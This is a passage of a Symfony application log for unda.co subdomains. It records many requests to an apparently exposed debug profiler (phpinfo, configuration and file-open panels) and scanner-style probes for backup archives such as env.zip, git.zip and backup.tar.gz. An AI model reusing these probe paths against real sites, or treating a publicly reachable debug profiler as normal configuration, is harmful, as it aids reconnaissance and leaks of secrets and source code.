  2468. [2025-12-17 16:39:30] request.INFO: Matched route "index_web". {"route":"index_web","route_parameters":{"_controller":"Hona\\WebBundle\\Controller\\DefaultController::indexAction","_route":"index_web"},"request_uri":"https://web.unda.co/","method":"GET"} []
  2469. [2025-12-17 16:42:05] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"e71d17","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/e71d17?panel=swiftmailer","method":"GET"} []
  2470. [2025-12-17 16:42:05] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=swiftmailer","method":"GET"} []
  2471. [2025-12-17 16:42:44] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"23ffec","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/23ffec?panel=request","method":"GET"} []
  2472. [2025-12-17 16:42:45] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=request","method":"GET"} []
  2473. [2025-12-17 16:44:30] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://api.unda.co/","method":"GET"} []
  2474. [2025-12-17 16:44:30] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
  2475. [2025-12-17 16:44:30] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  2476. [2025-12-17 16:44:30] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  2477. [2025-12-17 16:44:30] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
  2478. [2025-12-17 16:44:30] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
  2479. [2025-12-17 16:44:30] security.DEBUG: Calling Authentication entry point. [] []
  2480. [2025-12-17 16:47:24] request.INFO: Matched route "_profiler_phpinfo". {"route":"_profiler_phpinfo","route_parameters":{"_controller":"web_profiler.controller.profiler:phpinfoAction","_route":"_profiler_phpinfo"},"request_uri":"https://auth.unda.co/_profiler/phpinfo","method":"GET"} []
  2481. [2025-12-17 16:52:37] request.INFO: Matched route "_profiler_phpinfo". {"route":"_profiler_phpinfo","route_parameters":{"_controller":"web_profiler.controller.profiler:phpinfoAction","_route":"_profiler_phpinfo"},"request_uri":"https://admin.unda.co/_profiler/phpinfo","method":"GET"} []
  2482. [2025-12-17 16:52:37] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"cookie_presence","authenticators":1} []
  2483. [2025-12-17 16:52:37] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
  2484. [2025-12-17 16:52:37] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
  2485. [2025-12-17 16:52:37] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
  2486. [2025-12-17 16:52:37] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
  2487. [2025-12-17 16:52:37] security.DEBUG: Calling Authentication entry point. [] []
  2488. [2025-12-17 16:52:37] request.INFO: Matched route "_profiler_phpinfo". {"route":"_profiler_phpinfo","route_parameters":{"_controller":"web_profiler.controller.profiler:phpinfoAction","_route":"_profiler_phpinfo"},"request_uri":"https://web.unda.co/_profiler/phpinfo","method":"GET"} []
  2489. [2025-12-17 16:52:37] request.INFO: Matched route "_profiler_phpinfo". {"route":"_profiler_phpinfo","route_parameters":{"_controller":"web_profiler.controller.profiler:phpinfoAction","_route":"_profiler_phpinfo"},"request_uri":"https://unda.co/_profiler/phpinfo","method":"GET"} []
  2490. [2025-12-17 16:52:40] request.INFO: Matched route "home". {"route":"home","route_parameters":{"_controller":"Hona\\AuthBundle\\Controller\\HomeController::indexAction","domain":"auth.unda.co","_route":"home"},"request_uri":"https://auth.unda.co/?redirect_uri=https%3A%2F%2Fadmin.unda.co%2F_profiler%2Fphpinfo","method":"GET"} []
  2491. [2025-12-17 16:52:45] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /phpinfo"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /phpinfo\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  2492. [2025-12-17 16:53:46] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"23ffec","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/23ffec?panel=config","method":"GET"} []
  2493. [2025-12-17 16:53:46] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=config","method":"GET"} []
  2494. [2025-12-17 16:54:10] request.INFO: Matched route "home". {"route":"home","route_parameters":{"_controller":"Hona\\AuthBundle\\Controller\\HomeController::indexAction","domain":"auth.unda.co","_route":"home"},"request_uri":"https://auth.unda.co/","method":"GET"} []
  2495. [2025-12-17 16:54:14] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"0c03d3","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/0c03d3?panel=cache","method":"GET"} []
  2496. [2025-12-17 16:54:14] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=cache","method":"GET"} []
  2497. [2025-12-17 16:57:28] request.INFO: Matched route "hona_admin_default_index". {"route":"hona_admin_default_index","route_parameters":{"_controller":"Hona\\AdminBundle\\Controller\\DefaultController::indexAction","_route":"hona_admin_default_index"},"request_uri":"https://admin.unda.co/","method":"GET"} []
  2498. [2025-12-17 16:57:28] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"cookie_presence","authenticators":1} []
  2499. [2025-12-17 16:57:28] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
  2500. [2025-12-17 16:57:28] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
  2501. [2025-12-17 16:57:28] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
  2502. [2025-12-17 16:57:28] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
  2503. [2025-12-17 16:57:28] security.DEBUG: Calling Authentication entry point. [] []
  2504. [2025-12-17 16:57:29] request.INFO: Matched route "home". {"route":"home","route_parameters":{"_controller":"Hona\\AuthBundle\\Controller\\HomeController::indexAction","domain":"auth.unda.co","_route":"home"},"request_uri":"https://auth.unda.co/?redirect_uri=https%3A%2F%2Fadmin.unda.co%2F","method":"GET"} []
  2505. [2025-12-17 16:57:30] request.INFO: Matched route "index". {"route":"index","route_parameters":{"_controller":"Hona\\LandingBundle\\Controller\\DefaultController::indexAction","_route":"index"},"request_uri":"https://unda.co/","method":"GET"} []
  2506. [2025-12-17 16:57:31] request.INFO: Matched route "index_web". {"route":"index_web","route_parameters":{"_controller":"Hona\\WebBundle\\Controller\\DefaultController::indexAction","_route":"index_web"},"request_uri":"https://web.unda.co/","method":"GET"} []
  2507. [2025-12-17 16:57:51] request.INFO: Matched route "_profiler_search_results". {"route":"_profiler_search_results","route_parameters":{"_controller":"web_profiler.controller.profiler:searchResultsAction","token":"3e61cf","_route":"_profiler_search_results"},"request_uri":"https://web.unda.co/_profiler/3e61cf/search/results?ip=189.172.56.183&limit=10&method=POST","method":"GET"} []
  2508. [2025-12-17 16:57:51] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?ip=189.172.56.183&limit=10&method=POST","method":"GET"} []
  2509. [2025-12-17 16:58:55] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"c627b6","_route":"_profiler"},"request_uri":"https://web.unda.co/_profiler/c627b6?panel=time","method":"GET"} []
  2510. [2025-12-17 16:58:55] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?panel=time","method":"GET"} []
  2511. [2025-12-17 17:01:45] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "POST /hello.world"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"POST /hello.world\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  2512. [2025-12-17 17:05:15] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"23ffec","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/23ffec?panel=cache","method":"GET"} []
  2513. [2025-12-17 17:05:15] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=cache","method":"GET"} []
  2514. [2025-12-17 17:06:50] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"74da02","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/74da02?panel=db","method":"GET"} []
  2515. [2025-12-17 17:06:50] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=db","method":"GET"} []
  2516. [2025-12-17 17:12:46] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"8dbb7e","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/8dbb7e?panel=events","method":"GET"} []
  2517. [2025-12-17 17:12:46] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=events","method":"GET"} []
  2518. [2025-12-17 17:17:01] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"23ffec","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/23ffec","method":"GET"} []
  2519. [2025-12-17 17:17:01] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar","method":"GET"} []
  2520. [2025-12-17 17:18:46] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"latest","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/latest?ip=47.242.70.104&limit=10&method=GET","method":"GET"} []
  2521. [2025-12-17 17:18:46] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?ip=47.242.70.104&limit=10&method=GET","method":"GET"} []
  2522. [2025-12-17 17:22:06] request.INFO: Matched route "_profiler_open_file". {"route":"_profiler_open_file","route_parameters":{"_controller":"web_profiler.controller.profiler:openAction","_route":"_profiler_open_file"},"request_uri":"https://auth.unda.co/_profiler/open?file=vendor%2Fsensio%2Fgenerator-bundle&line=0","method":"GET"} []
  2523. [2025-12-17 17:24:09] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /index.html"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /index.html\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  2524. [2025-12-17 17:31:11] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"GET"} []
  2525. [2025-12-17 17:32:31] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"a19422","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/a19422?panel=request","method":"GET"} []
  2526. [2025-12-17 17:32:31] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=request","method":"GET"} []
  2527. [2025-12-17 17:45:16] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"a19422","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/a19422","method":"GET"} []
  2528. [2025-12-17 17:45:16] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar","method":"GET"} []
  2529. [2025-12-17 17:50:10] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"af2b6f","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/af2b6f?panel=router","method":"GET"} []
  2530. [2025-12-17 17:50:10] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=router","method":"GET"} []
  2531. [2025-12-17 17:52:39] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"fb5734","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/fb5734?panel=logger","method":"GET"} []
  2532. [2025-12-17 17:52:39] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=logger","method":"GET"} []
  2533. [2025-12-17 17:57:12] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"a19422","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/a19422?panel=cache","method":"GET"} []
  2534. [2025-12-17 17:57:12] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=cache","method":"GET"} []
  2535. [2025-12-17 17:59:14] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "POST /vpnsvc/connect.cgi"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"POST /vpnsvc/connect.cgi\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  2536. [2025-12-17 17:59:51] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"2cc755","_route":"_profiler"},"request_uri":"https://web.unda.co/_profiler/2cc755?panel=time","method":"GET"} []
  2537. [2025-12-17 17:59:51] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?panel=time","method":"GET"} []
  2538. [2025-12-17 18:08:41] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"a19422","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/a19422?panel=time","method":"GET"} []
  2539. [2025-12-17 18:08:41] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=time","method":"GET"} []
  2540. [2025-12-17 18:09:24] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"GET"} []
  2541. [2025-12-17 18:10:50] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"025fac","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/025fac?panel=request","method":"GET"} []
  2542. [2025-12-17 18:10:50] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=request","method":"GET"} []
  2543. [2025-12-17 18:16:22] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"GET"} []
  2544. [2025-12-17 18:19:18] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"623c96","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/623c96?panel=twig","method":"GET"} []
  2545. [2025-12-17 18:19:18] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=twig","method":"GET"} []
  2546. [2025-12-17 18:20:44] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /env.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /env.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  2547. [2025-12-17 18:20:44] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /backend.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /backend.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  2548. [2025-12-17 18:20:44] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /git.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /git.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  2549. [2025-12-17 18:20:44] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /app.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /app.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  2550. [2025-12-17 18:20:44] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /app/app.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /app/app.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  2551. [2025-12-17 18:20:44] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /backup.tar.gz"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /backup.tar.gz\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  2552. [2025-12-17 18:20:44] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /home.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /home.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  2553. [2025-12-17 18:20:44] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /api.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /api.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  2554. [2025-12-17 18:20:44] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /backup.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /backup.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  2555. [2025-12-17 18:23:38] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"83a376","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/83a376?panel=request","method":"GET"} []
  2556. [2025-12-17 18:23:38] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=request","method":"GET"} []
  2557. [2025-12-17 18:28:04] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /backup.tar.gz"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /backup.tar.gz\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  2558. [2025-12-17 18:28:04] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /env.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /env.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  2559. [2025-12-17 18:28:04] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /git.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /git.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
